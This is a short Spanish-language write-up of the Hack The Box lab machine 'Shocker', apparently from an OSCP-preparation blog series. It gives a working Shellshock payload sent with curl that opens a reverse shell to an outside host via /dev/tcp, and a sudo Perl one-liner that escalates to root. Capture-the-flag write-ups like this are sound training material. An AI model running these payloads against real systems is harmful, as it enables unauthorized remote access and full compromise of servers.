Hack the Box es una plataforma en línea para probar y mejorar tus habilidades en pruebas de penetración y ciberseguridad.

En esta serie de artículos mostraremos cómo los evaluadores junior completan algunas máquinas de Hack The Box en su camino hacia OSCP, una certificación muy conocida, respetada y requerida para muchos puestos de ciberseguridad. Los certificados OSCP son capaces de identificar las vulnerabilidades existentes y ejecutar ataques organizados de manera controlada. Pueden aprovechar o modificar el código de exploits existentes en su beneficio, realizar pivoting en la red y exfiltrar datos, y comprometer los sistemas debido a configuraciones deficientes.

¡Empecemos con la diversión!

Shocker

Initial Foothold

Usemos Gobuster en el puerto 80. Encontramos un directorio que devuelve un 403 (forbidden): cgi-bin.

Como este The Box se llama Shocker, espero algún tipo de vulnerabilidad de Shellshock. Para eso, vamos a a ver si podemos encontrar un script en bash dentro de la carpeta que acabamos de encontrar.

gobuster dir -w /home/angel/ctf/wordlists/web/raft-medium-directories.txt -u http://10.10.10.56/cgi-bin/ -x sh

Encontramos: 10.10.10.56/cgi-bin/user.sh

User

Después de buscar por un tiempo acerca de shellshock + cgi-bin se me ocurrió esto: curl -s -A '() { :; }; echo "Content-Type: text/plain"; echo; /bin/bash -c "bash -i >& /dev/tcp/10.10.14.22/12345 0>&1"' http://10.10.10.56/cgi-bin/user.sh

Lo que nos da una shell inversa. Podemos conseguir la bandera de usuario en: "home/shelly/user.txt".

Raíz

Haciendo sudo -l revela que podemos usar Perl como root sin una contraseña.

Una búsqueda rápida en GTFObins y obtenemos esto: sudo /usr/bin/perl -e 'exec "/bin/sh"; lo que nos da una shell de root.